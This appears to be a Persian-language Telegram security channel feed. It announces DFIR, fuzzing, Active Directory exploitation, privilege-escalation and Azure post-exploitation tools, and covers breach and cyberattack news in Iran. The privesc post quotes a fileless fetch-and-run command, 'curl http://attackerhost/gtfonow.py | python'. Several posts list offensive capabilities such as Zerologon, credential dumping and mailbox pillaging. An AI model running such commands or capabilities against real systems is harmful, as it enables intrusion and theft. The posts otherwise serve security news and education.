‏⭕️ اسکریپتی با استفاده از پاورشل نوشته شده است و برای IR و Threat Hunting در ویندوز مناسب است.
با استفاده از این اسکریپت، می‌توان به سرعت لیستی از موارد زیر را بررسی کرد:
‏

‏General information
‏Accountand group information
‏Network
‏Process Information
‏OS Build and HOTFIXE
‏Persistence
‏HARDWARE Information
‏ Encryption information
‏FIREWALL INFORMATION‏
‏Services
‏History
‏SMB Queries
‏Remoting queries
‏REGISTRY Analysis
‏LOG queries
‏Instllation of Software
‏User activity
بعلاوه، با استفاده از کوئری‌های پیشرفته، موارد زیر نیز قابل بررسی هستند:
‏ Prefetch file information
‏DLL List
‏WMI filters and consumers

‏
#DFIR #ThreatHunting
@securation

‏⭕️‏Fuzzer ای بر روی شبیه ساز SIMICS نوشته شده که قابلیت فاز کردن UEFI اپلیکیشن ها،bootloader ها،BIOS،کرنل ماژول ها، device firmware ها و حتی برنامه های سطح یوزر ویندوز و لینوکس را دارد.
از قابلیت ها و ویژگی های آن میتوان مثال زد:
‏

‏Edge coverage guided
‏Snapshotting (fully deterministic)
‏Parallel fuzzing (across cores, machines soon)
‏Easy to add to existing SIMICS projects
‏Triage mode to reproduce and debug crashes
‏Modern fuzzing methodologies:
‏ Redqueen/I2S taint-based mutation
‏MOpt & Auto-token mutations
‏TSFFS is focused on several primary use cases:
‏UEFI and BIOS code, particulary based on EDKII
‏Pre- and early-silicon firmware and device drivers
‏Hardware-dependent kernel and firmware code
‏Fuzzing for complex error conditions
‏However, TSFFS is also capable of fuzzing:
‏Kernel & kernel drivers
‏User-space applications
‏Network applications

#Exploitation #Fuzzing
@securation

⭕️ شرکت امنیتی Hudson Rock یک گزارش تهیه کرده و نوشته سیستم یکی از کارمندان شرکت اسنپ فود به بدافزار StealC آلوده شده و از طریق اون دسترسی به اطلاعات پیدا کردند.

یکی از مشکلات شرکت ها و سازمان های ایران رو به شکل خیلی ساده و خلاصه میشه یا همین روش ها هک کرد.
دلیل اصلی هم نبود متخصص و دیدگاه مدیریت اشتباه هستش.
مثلا همه فکر میکنند که کار Blue Team توی سازمان ، این هست که چندتا مانیتورینگ نصب کنند و یه دوره اسپلانک توی اکادمی فلانی ثبت نام کنند و بعنوان Soc کار استخدامی بشن.
کل تیم رو میذاری روی Network Packet Analysis و هیچکدوم نمیتونند یک کار مفیدی انجام بدن پکت ها رو تحلیل کنند.
نکته مهم اینه امروزه تحلیلگر بدافزار نیاز قطعی هر شرکت و سازمانی هست ولی متاسفانه بخاطر نبود مدیر لایق و فنی و ترویج بیسوادی در جامعه به سمت اسکریپت کیددی ساختن توی حوزه Bug Bounty که فقط وب رو مبنای همه چیز قرار میدن ، باعث شده سازمان و شرکت و هرجایی اینطور موارد رو میبینه دیگه به بحثهای عمیق امنیت توجهی نداشته باشه.
اگر اسنپ فود با این روش که استیلر روی سیستم یکی از کارمندهاش بوده و هک شده بنظرم یک بار دیگه از صفر کل زیرساخت شرکت و تمام نیروی انسانی چه فنی چه اداری و غیره ، همه رو آموزش بدید و یک Review بزنید کل سیستم های اینها رو.
هدف قرار دادن کارمندهایی که دسترسی بیشتری در سازمان دارن ، توی پروژه های Red Team معمولا تعریف میشه ، چیزی که اسنپ فود و کل تیم اسنپ همچین موردی نداشتن و شایدم ما هیچوقت ندیدیم همچین چیزهایی ازشون.
درهرصورت اگه توی یک کمپانی که داری محصول و دیتا هست کار میکنید، بدنیست بجز اون شرکت امنیتی یا تیم امنیتی که پیمانکارِ ثابت شما هست ، سالی یک بار یه پروژه Red Team بدید خارج از این اکیپ های خودتون بلکه اقدام مناسبی جهت امنیت شرکت و سازمان خودتون داشته باشید.

https://www.infostealers.com/article/mysterious-hacker-strikes-iran-with-major-cyberattacks-against-industry-leading-companies/
#هک #اسنپ_فود #دیتا
@securation

⭕️ امروزه برای سریع تر کردن و خودکار سازی فرایند تست نفوذ و یا ردتیم ما سعی میکنیم اسکریپت هایی یا اصطلاحا Kit هایی توسعه بدیم که فرایند کار بهبود پیدا کنه. Kit هایی برای فرایند Recon و Exploit در Active Directory توسعه داده شده که به ویژگی هاشون میپردازیم:
اسکرپیت AD-SecurityAudit.sh بر روی Recon ابتدایی و شناسایی آسیب پذیری ها دقت دارد با ویژگی های کلیدی زیر:
‏

LDAP and Service Account Queries: Conducts LDAP searches targeting service accounts in the AD.
Kerberos Ticket Analysis: Uses Impacket's tools for analyzing Kerberos ticket vulnerabilities and identifying accounts without pre-authentication
Comprehensive Kerberos and SMB Enumeration: Employs SilentHound and Enum4linux-ng for Kerberos auditing and detailed SMB, user, and system information scanning.
Enumeration Techniques: Implements RID brute-force and NetExec SMB enumeration for discovering user accounts, groups, and security policies.
Exploitation of Windows Services: Executes Zerologon and PetitPotam attacks to target known vulnerabilities.
Execution Summary and Actionable Guidance: Completes with a success message and provides insights for further actions, such as hash cracking.

و اسکریپت AutoMapExec.sh عمیق تر شده و بر روی اکسپلویت کردن آن آسیب پذیری ها دقت دارد با ویژگی های زیر:

Credential-Based Targeting: Uses user-provided credentials for a more thorough analysis.
Kerberos Auditing and Extensive SMB Enumeration: Combines SilentHound and multiple NetExec commands for a deeper level of SMB and security analysis.
Network and AD Comprehensive Scanning: Utilizes CrackMapExec for an extensive view of the network, including computer listings, local groups, and NTDS extraction.Testing Against Major Vulnerabilities: Incorporates exploitation of significant
Testing Against Major Vulnerabilities: Incorporates exploitation of significant vulnerabilities like Zerologon, PetitPotam, and NoPAC.
BloodHound Integration and RDP Enablement: Facilitates AD data collection for BloodHound analysis and enables Remote Desktop Protocol.
Diverse Command Execution and Data Retrieval: Performs a range of system commands and retrieves the SAM database for in-depth credential analysis.
Detailed Execution Overview: Concludes with a summary of successful execution, signifying the completion of a comprehensive scanning and enumeration process

https://github.com/emrekybs/AD-AssessmentKit
#RedTeam #Exploitation #AD
@securation

⭕️یک نیروی نفوذی سازمان اطلاعات هلند بنام اریک، عامل منتشر کننده ویروس خرابکار استاکس‌نت در سال ۲۰۰۷ بوده ، ویروسی که خرابکاری زیادی در راکتور های هسته ای ایران به وجود آورد.

https://nos.nl/artikel/2504114-nederlander-saboteerde-atoomcomplex-in-iran-den-haag-wist-niets

#stuxnet
@securation

⭕️بسته های بلند مدت اینترنت توسط اپراتورهای جمهوری اسلامی همگی از پنل نرم افزارها غیب شدن تا مردم دیگه هرهفته و ماه بسته های گرون شده رو به قیمت دوبرابر بخرند.
وزیر قطع ارتباطات جمهوری اسلامی گفته بود اپراتورها حق ندارن بسته ها رو حذف کنند.
#پشمک_مالنده

https://twitter.com/1rpwn/status/1744635321688420715?t=SV59vfHEark2ZQeS58Zlbg&s=19

⭕️ اسکریپتی توسعه داده شده است که از ابزارهای توسعه داده قبلی مانند EDRSilencer و FireBlock بهره برده است. هدف اصلی این اسکریپت، شناسایی فایل های اجرایی مختلف است که با استفاده از پلتفرم فیلترینگ ویندوز (WFP) غیر فعال شده اند. برای دستیابی به این هدف، از ماژول NtObjectManager در اسکریپت استفاده شده است.

Detection approach

There is no native way to list and interact with WFP. To do that we need to use the NtObjectManager module.

With the help of NtObjectManager we will be able to list all filters and the approach will be:

Create a list with the executables you want to check
Listed filters that block connections
Filter that list by the executables provided

#RedTeam #Evasion
@securation

⭕️ به منظور خودکارسازی فرایند Privesc در سیستم های لینوکس و یونیکس، یک ابزار توسعه داده شده است که در دسته‌بندی Missconfig های setuid/setgid و sudo permission ها و ... تمرکز دارد. این ابزار عمدتاً برای مسابقات CTF طراحی شده است، اما در محیط های واقعی نیز قابل استفاده است.

Features

Automatically exploit misconfigured sudo permissions.
Automatically exploit misconfigured suid, sgid permissions.
Automatically exploit misconfigured capabilities.
Automatically convert arbitrary file read primitive into shell by stealing SSH keys.
Automatically convert arbitrary file write primitive into shell by dropping SSH keys.
Automatically convert arbitrary file write primitive into shell by writing to cron.
Automatically convert arbitrary file write primitive into shell using LD_PRELOAD.
Single file, easy to run fileless with curl http://attackerhost/gtfonow.py | python

#RedTeam #Privesc #bypass
@securation

⭕️ دانشگاه امیر کبیر هک شده؟
میگن ۲ هزار دلار گذاشتن فروش همه چیز را


#news @securation

⭕️مدیر وبسایت #Breachedforum که محل خرید و فروش دیتابیس ها بود به 15 سال زندان در آمریکا محکوم شد.

امیدوارم روزی ایران هم اینشکلی قوانین رو سفت و سخت به کار بگیره تا هرکسی راحت جرم و جنایت رو ترویج نده.
‎#hack ‎#Prison ‎#breached ‎#Forum
@securation

⭕️‏تیم امنیت Microsoft طی یک اطلاعیه از شناسایی حمله یک گروه از هکرهای دولتی منتسب به روسیه خبر داده است.
حملاتی که تحت عنوان nation state هستن ، تحت حمایت یک نهاد جاسوسی یا دولتها هستند که از نظر تکنیکی و ابزاری بابت پشتیبانی های مالی بالا ، درصد موفق بودنشون بالاست...

https://msrc.microsoft.com/blog/2024/01/microsoft-actions-following-attack-by-nation-state-actor-midnight-blizzard/
#News #Hack #fsb #russia
@securation

⭕️ اینکه اگر توی یک کشور سالم بود ، خانوادگی سرش رو میذاشتن توی توالت و بابت این کار قانون میتونست با هرشکایت یک کاربر هزینه های کلانی جریمه از صرافی بگیره.
اما چون اینجا ایران مهد فساد هستش، همین کاربر بهش هزار دلار نشون بدی دیتای شما رو میزاره توی هارد و میاره میفروشه توی تلگرام.
همیشه قرار نیست سایت و سرورها امن بشن چون اینا بحثهای فنی قضیه هست.
بحث اصلی هرشرکت و سازمانی توی ایران فساد اخلاقی و استفاده از خلا قانونی هستش که هرکسی میتونه توی شرکت نهار بخوره و تایم خوش گذرونیشون دلقک شدن بشه با تقلیدِ ویدیوی احراز هویت های بقیه.
فکر کن چهارچوب سازمانیِ طویله ی محل کارِ این کاربر اجازه میده این "کارمندِ تُف پاک کن" دسترسی به همه بخش های دیتا و حریم خصوصی کاربران داره.
درصد بالایی از شرکتها و سازمان های ایران رو در یک توییت نشان داد.
#فاجعه_نیروی_انسانی
@securation

⭕️خانم Sylvia Serfaty استاد New York University برنده‌ی جایزه‌ی Maryam Mirzakhani Prize در سال ۲۰۲۴ شدن.
لینک توئیت
@securation

⭕️‏تنها چند ثانیه قبل از انفجار کوره مذاب توسط هکرها دو نفر از کارگران مجتمع فولاد خوزستان از اونجا فرار میکنند.
این انفجار از طریق هک سیستمهای متصل به کوره مذاب در کارخانجات فولاد ایران توسط گروه هکری ‌#گنجشک_درنده صورت گرفت، همون گروهی که پشت هکهای سیستم کارت سوخت بود و براساس شواهد وابستگیهایی به ‌#اسراییل⁩ هم داره

‏این مقاله اخیر اندی گرینبرگ ابعاد مختلف حملات ‌ #سایبری خطرناکترین (برخلاف اسمش، ‌#گنجشک_درنده ) گروه هکری فعال علیه ایران رو بررسی میکنه.
این گروه تا کنون چهار حمله موفق تاثیرگذار شامل دو بار اختلال گسترده در سامانه کارت سوخت، انفجار در کارخانجات #فولاد و #هک سیستمهای راه آهن سراسری رو در داخل ایران اجرا کرده

https://www.wired.com/story/predatory-sparrow-cyberattack-timeline/
#news #hack
@securation

⭕️ اسم سینا خیرخواه هکر ایرانی توی مسابقات #Pwn2Own میدرخشه

https://x.com/thezdi/status/1750780912533672394?t=qcm6L12Gr9EECRjA7Gh3ew&s=35

#pwn2Own #ZDI
@securation

گران ترین آسیب پذیری RCE تاریخ ایران ما رو یادآور روزهای سخت حماسه افرینی حوزه باگ بانتی انداخت 😁
https://twitter.com/1rpwn/status/1750924716708163667?t=u6RguGU9K8WZYdCxSqc1XA&s=19
#bugbounty #iranianHackers
@securation

⭕️ در پروسه Post Exploit در ‏RedTeam Azure ابزاری برای تعامل با Microsoft Graph API نوشته شده که ویژگی های مختلفی دارد.
البته باید گفت اکثریت ویژگی ها نیاز به توکن دارد که این مورد را هم پوشش داده است
از جمله ویژگی های این ابزار :

It consists of three separate parts:

A PowerShell noscript where the majority of modules are located
An HTML GUI that can leverage an access token to navigate and pillage a user's account
A simple PHP redirector for harvesting authentication codes during an OAuth flow
Main Features

Search and export email
Search and export SharePoint and OneDrive files accessible to a user
Search all Teams chats and channels visible to the user and export full conversations
Deploy malicious apps
Discover misconfigured mailboxes that are exposed
Clone security groups to carry out watering hole attacks
Find groups that can be modified directly by your user or where membership rules can be abused to gain access
Search all user attributes for specific terms
Leverage a GUI built on the Graph API to pillage a user's account
Dump conditional access policies
Dump app registrations and external apps including consent and scope to identify potentially malicious apps
Tools to complete OAuth flow during consent grant attacks
GraphRunner doesn't rely on any third-party libraries or modules
Works with Windows and Linux
Continuously refresh your token package

#RedTeam #Cloud #Azure
@securation